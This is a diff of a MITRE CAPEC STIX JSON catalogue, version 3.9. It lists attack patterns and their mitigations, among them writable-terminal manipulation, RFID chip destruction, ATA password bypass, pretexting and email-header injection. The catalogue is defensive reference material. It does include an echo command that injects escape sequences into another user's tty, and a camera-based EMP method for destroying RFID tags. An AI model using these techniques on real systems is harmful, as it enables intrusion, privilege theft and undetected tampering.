"3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--484c12f4-80ad-4fe0-91ec-ad26afdc6082", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f365abec-a16c-48a7-ae51-bdc687d899bb", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation routines should check and enforce both input data types and content against a positive specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges)", + "id": "course-of-action--a4679da3-09cf-480b-ad0c-5606e510b08d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-4-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b789de10-900c-4578-a3f2-13683cc5bbc8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4679da3-09cf-480b-ad0c-5606e510b08d", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--62c4c1aa-5430-4146-8735-ca6959483c64", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.", + "external_references": [ + { + "external_id": "CAPEC-40", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/40.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Terminal Devices", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n \"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.\n \"$echo -e \"\\033[30m\\033\\132\" > /dev/ttyXX\n where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim's tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid.\" [REF-1]\n If the victim continues to hit \"enter\" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify attacker-writable terminals: Determine if users TTYs are writable by the attacker.

    2. Techniques
    Determine the permissions for the TTYs found on the system. Any that allow user write to the TTY may be vulnerable.
    Attempt to write to other user TTYs. This approach could leave a trail or alert a user.

Exploit

  1. Execute malicious commands: Using one or more vulnerable TTY, execute commands to achieve various impacts.

    2. Techniques
    Commands that allow reading or writing end user files can be executed.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user's terminals." + ], + "x_capec_resources_required": [ + "Access to a terminal on the target network" + ], + "x_capec_skills_required": { + "Low": "Ability to discover permissions on terminal devices. Of course, brute force can also be used." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that terminals are only writeable by named owner user and/or administrator", + "id": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-40-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f41d0244-df5c-41e8-9fd1-046642dd7609", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b79f1d6a-d501-4456-9de3-b3cf4778b8f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it.", + "external_references": [ + { + "external_id": "CAPEC-400", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/400.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93", + "modified": "2022-02-22T00:00:00.000Z", + "name": "RFID Chip Deactivation or Destruction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system. Various methods exist for damaging or deactivating RFID tags. For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-401", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/401.html" + }, + { + "external_id": "CWE-1263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1263.html" + } + ], + "id": "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Physically Hacking Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.", + "external_references": [ + { + "external_id": "CAPEC-402", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/402.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Oliver Tennert, Using the ATA security features of modern hard disks and SSDs, 2014, Admin Magazine", + "external_id": "REF-701", + "source_name": "reference_from_CAPEC", + "url": "https://www.admin-magazine.com/Archive/2014/19/Using-the-ATA-security-features-of-modern-hard-disks-and-SSDs" + }, + { + "description": "Breaking ATA Password Security, The University of Texas at Austin Information Security Office", + "external_id": "REF-702", + "source_name": "reference_from_CAPEC", + "url": "https://security.utexas.edu/education-outreach/BreakingATA" + } + ], + "id": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Bypassing ATA Password Security", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n The A-FF Repair Station tool is a data recovery utility that can be used for ATA password removal (both High and Maximum level) and firmware area recovery. An adversary with access to this tool could reset the ATA password to bypass this security feature and unlock the hard drive. The adversary could then obtain any data contained within the drive. [REF-702]\n ", + "\n An adversary gains physical access to the targeted hard drive and installs it into a system that does not support ATA security features. Once the drive is installed in the feature-lacking system, the adversary is able to reset the hard drive password via the BIOS. As a result, the adversary is able to bypass ATA password security and access content on the drive.\n " + ], + "x_capec_prerequisites": [ + "Access to the system containing the ATA Drive so that the drive can be physically removed from the system." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid using ATA password security when possible.", + "id": "course-of-action--2ca19cbb-9df1-447b-9d02-9b8639ed2018", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a9a4381-1976-470b-8e7a-9b7154f17fa9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2ca19cbb-9df1-447b-9d02-9b8639ed2018", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use full disk encryption to protect the entire contents of the drive or sensitive partitions on the drive.", + "id": "course-of-action--42bee69d-54e9-4b16-8e31-ea5eadd37120", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3007f9eb-cd21-4e1f-b66e-4faf4bc852de", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--42bee69d-54e9-4b16-8e31-ea5eadd37120", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage third-party utilities that interface with self-encrypting drives (SEDs) to provide authentication, while relying on the SED itself for data encryption.", + "id": "course-of-action--f9e11632-380e-4024-ab7e-cfba51c77caa", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39c5db88-5296-4b0f-b4df-2621887afa62", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9e11632-380e-4024-ab7e-cfba51c77caa", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-404", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/404.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--93f7216f-ddbe-4484-8fa6-87b680f16898", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Social Information Gathering Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-405", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/405.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Social Information Gathering via Research", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more, including hardware devices. By collecting this information an adversary may be able to learn important facts about the person or organization that play a role in helping the adversary in their attack.", + "external_references": [ + { + "external_id": "CAPEC-406", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/406.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Dumpster Diving", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Documents and materials improperly disposed of can lead to information disclosure if an adversary comes across it.)" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "An adversary must have physical access to the dumpster or downstream processing facility." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the adversary's interests. During a pretexting attack, the adversary creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information.", + "external_references": [ + { + "external_id": "CAPEC-407", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/407.html" + }, + { + "description": "Gather Victim Identity Information", + "external_id": "T1589", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1589" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1" + ], + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "attack-pattern--5c60a410-64a7-46e2-9d46-82a232a6ce3e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Depending on the adversary's intentions and the specific nature their actions/requests, a successful pretexting attack can result in the compromise to the confidentiality of sensitive information in a variety of contexts.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "The adversary dresses up like a jogger and runs in place by the entrance of a building, pretending to look for their access card. Because the hood obscures their face, it may be possible to solicit someone inside the building to let them inside." + ], + "x_capec_extended_description": "\n Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. In simple form, these attacks can be leveraged to learn information about a target. More complicated iterations may seek to solicit a target to perform some action that assists the adversary in exploiting organizational weaknesses or obtaining access to secure facilities or systems. Pretexting is not a one-size fits all solution. Good information gathering techniques can make or break a good pretext. A solid pretext is an essential part of building trust. If an adversary’s alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb", + "attack-pattern--5e0c909b-70a3-4275-a696-91801247ed68", + "attack-pattern--7ed74d19-ed2b-40c4-a63c-54367b2653c4", + "attack-pattern--490fc09c-a624-44cd-8e9e-f4ce8ad2311e" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the pretext that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks.", + "id": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-407-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bff09429-66bb-4bc2-90be-eb28271786e4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "target_ref": "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-408", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/408.html" + } + ], + "id": "attack-pattern--4b3c7a8c-f801-43d9-9ba7-1d0e2dc87e8b", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-409", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/409.html" + } + ], + "id": "attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Non-Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.", + "external_references": [ + { + "external_id": "CAPEC-41", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/41.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Meta-characters in E-mail Headers to Inject Malicious Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n To:From:Headerdef: whatever\n ", + "\n Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic.\n Meta-characters like \\w \\s \\d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user's process.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Identify and characterize metacharacter-processing vulnerabilities in email headers: An attacker creates emails with headers containing various metacharacter-based malicious payloads in order to determine whether the target application processes the malicious content and in what manner it does so.

    2. Techniques
    Use an automated tool (fuzzer) to create malicious emails headers containing metacharacter-based payloads.
    Manually tampering email headers to inject malicious metacharacter-based payload content in them.

Exploit

  1. An attacker leverages vulnerabilities identified during the Experiment Phase to inject malicious email headers and cause the targeted email application to exhibit behavior outside of its expected constraints.

    2. Techniques
    Send emails with specifically-constructed, metacharacter-based malicious payloads in the email headers to targeted systems running email processing applications identified as vulnerable during the Experiment Phase.
